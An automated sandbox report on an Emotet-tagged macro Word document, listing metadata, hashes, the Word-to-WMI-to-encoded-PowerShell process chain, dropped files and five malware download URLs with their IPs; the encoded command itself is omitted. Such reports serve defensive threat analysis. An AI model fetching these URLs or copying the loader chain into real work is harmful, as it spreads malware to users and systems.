File name: 7cfb222a4e97e5ec87f4d2c6d0a8913ed3ccae3a3861507c98e78269b724875c.doc

Full analysis: https://app.any.run/tasks/c7bbc189-3ba8-4634-9b73-943283758c39
Verdict: Malicious activity
Threats: Emotet

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime it has been upgraded repeatedly into highly destructive malware. It mainly targets corporate victims, but private users are also infected through mass spam email campaigns.

Analysis date: October 14, 2019, 19:19:39
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: macros, macros-on-open, generated-doc, emotet-doc, emotet
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: CSS, Subject: program, Author: Johnnie Mosciski, Keywords: Sleek Soft Soap, Comments: 24 hour, Template: Normal.dotm, Last Saved By: Wyman Swift, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Oct 14 06:52:00 2019, Last Saved Time/Date: Mon Oct 14 06:52:00 2019, Number of Pages: 1, Number of Words: 30, Number of Characters: 172, Security: 0
MD5: B613A11097843DDBB5ABECF23E2808E5
SHA1: A9F53D866F76C480230F462C3384434310D09FED
SHA256: 7CFB222A4E97E5EC87F4D2C6D0A8913ED3CCAE3A3861507C98E78269B724875C
SSDEEP: 6144:Tg39prLKUzSFnLx3/hvbrptZI141ekKGQ2:Tg39prGUGFt3l3TZ5ej

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided as-is for the user's information. ANY.RUN does not guarantee the maliciousness or safety of the content.
  • MALICIOUS: No malicious indicators.
  • SUSPICIOUS
    • Executed via WMI: powershell.exe (PID: 1740)
    • PowerShell script executed: powershell.exe (PID: 1740)
    • Creates files in the user directory: powershell.exe (PID: 1740)
  • INFO
    • Creates files in the user directory: WINWORD.EXE (PID: 2660)
    • Reads Microsoft Office registry keys: WINWORD.EXE (PID: 2660)
Find more information about signature artifacts and their mapping to the MITRE ATT&CK™ matrix in the full report.
No malware configuration extracted.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: CSS
Subject: program
Author: Johnnie Mosciski
Keywords: Sleek Soft Soap
Comments: 24 hour
Template: Normal.dotm
LastModifiedBy: Wyman Swift
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2019:10:14 05:52:00
ModifyDate: 2019:10:14 05:52:00
Pages: 1
Words: 30
Characters: 172
Security: None
CodePage: Windows Latin 1 (Western European)
Company: Sipes, Schowalter and Koch
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 201
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
Manager: Sporer
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
All screenshots are available in the full report
Total processes: 38
Monitored processes: 2
Malicious processes: 0
Suspicious processes: 1

Behavior graph (interactive in the full report): start → winword.exe → powershell.exe

Process information

PID: 2660
CMD: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\7cfb222a4e97e5ec87f4d2c6d0a8913ed3ccae3a3861507c98e78269b724875c.doc"
Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Indicators: -
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Word
Version: 14.0.6024.1000

PID: 1740
CMD: powershell -e [base64-encoded command omitted]
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: wmiprvse.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Total events: 1 876
Read events: 1 083
Write events: 0
Delete events: 0

Modification events: No data

Executable files: 0
Suspicious files: 2
Text files: 0
Unknown types: 15

Dropped files

PID | Process | Filename | Type | MD5 | SHA256
2660 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA7F2.tmp.cvr | - | - | -
1740 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\V9FMY44ZJX6UGURFXBY7.temp | - | - | -
2660 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CC985955.wmf | wmf | 5F6A5230B31FE7E16E1BF428DA36186B | C81180A9C124061F19A41ABBC1CDEC81B8182FCDB26240A222FB88684B01471F
2660 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7A2E50F9.wmf | wmf | E9EA0224A0B59683F7F913B80FC4C68B | 96116C45AEAB440DC68095A682D4F2F7F81CD465B400FD6F847A03721BE80072
2660 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DA798ED8.wmf | wmf | E68EE2852AA1830F259E98F70AB65B66 | 085A291D0FE90E2E97FC4E548916BE37288E17116EC8120E124A1FE73E70BECF
2660 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\36C4D373.wmf | wmf | AC07EEC2DBF71D4064CA3F9F20D0A086 | D0EE5067835E5A1292E2805A6FDE4F8652D5287890B2651D366DCCA67247C965
2660 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\633E566F.wmf | wmf | E6CC30CFFCBBFCDEAA6486310C5F1A23 | 4C501A29AF5C6ACD9C3C63874C011A712B24A0108D89E68735A2C1EE0B1F39C9
2660 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\90EE52A6.wmf | wmf | 7072FC3981FACAB89652F8EC8D085FB3 | 16C4AF060AF9BAC73DCF151B6C2013BE7198AAC0813A1125BA990B85564DA029
2660 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | D3EBFE577A9E5C0557E4EBD716FD1665 | B524ABBCCF23E897595B6C25CA4F696628A119623F491796A89D77F311635EE0
2660 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$fb222a4e97e5ec87f4d2c6d0a8913ed3ccae3a3861507c98e78269b724875c.doc | pgc | 7764119855872AE04C1213CED80CDE79 | 602DABD291E14E352CE988E37190BF163A0307B72131D1197C9B33932BBD5A65
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 5
TCP/UDP connections: 5
DNS requests: 6
Threats: 0

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
1740 | powershell.exe | GET | 404 | 192.155.90.244:80 | http://www.moneyhairparty.com/class.local/parts_service/s4y0/ | US | xml | 345 b | unknown
1740 | powershell.exe | GET | 404 | 69.42.58.144:80 | http://www.correlation.ca/fonts/FSKrYOc/ | CA | xml | 345 b | suspicious
1740 | powershell.exe | GET | 404 | 149.56.222.236:80 | http://tendenciasv.com/wp-admin/1d972a/ | CA | xml | 345 b | suspicious
1740 | powershell.exe | GET | 404 | 45.56.101.4:80 | http://www.divinedollzco.com/wp-content/upgrade/kcbg/ | US | xml | 345 b | unknown
1740 | powershell.exe | GET | 404 | 45.119.83.237:80 | http://dncvietnam.com/wp-includes/4bv4z7u/ | VN | xml | 345 b | malicious

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
1740 | powershell.exe | 45.56.101.4:80 | www.divinedollzco.com | Linode, LLC | US | unknown
1740 | powershell.exe | 69.42.58.144:80 | www.correlation.ca | Peer 1 Network (USA) Inc. | CA | suspicious
1740 | powershell.exe | 149.56.222.236:80 | tendenciasv.com | OVH SAS | CA | suspicious
1740 | powershell.exe | 192.155.90.244:80 | www.moneyhairparty.com | Linode, LLC | US | unknown
1740 | powershell.exe | 45.119.83.237:80 | dncvietnam.com | Long Van System Solution JSC | VN | malicious

DNS requests

Domain | IP | Reputation
tendenciasv.com | 149.56.222.236 | suspicious
www.correlation.ca | 69.42.58.144 | suspicious
www.moneyhairparty.com | 192.155.90.244 | unknown
www.divinedollzco.com | 45.56.101.4 | unknown
dncvietnam.com | 45.119.83.237 | malicious

Threats: No threats detected
Debug info: none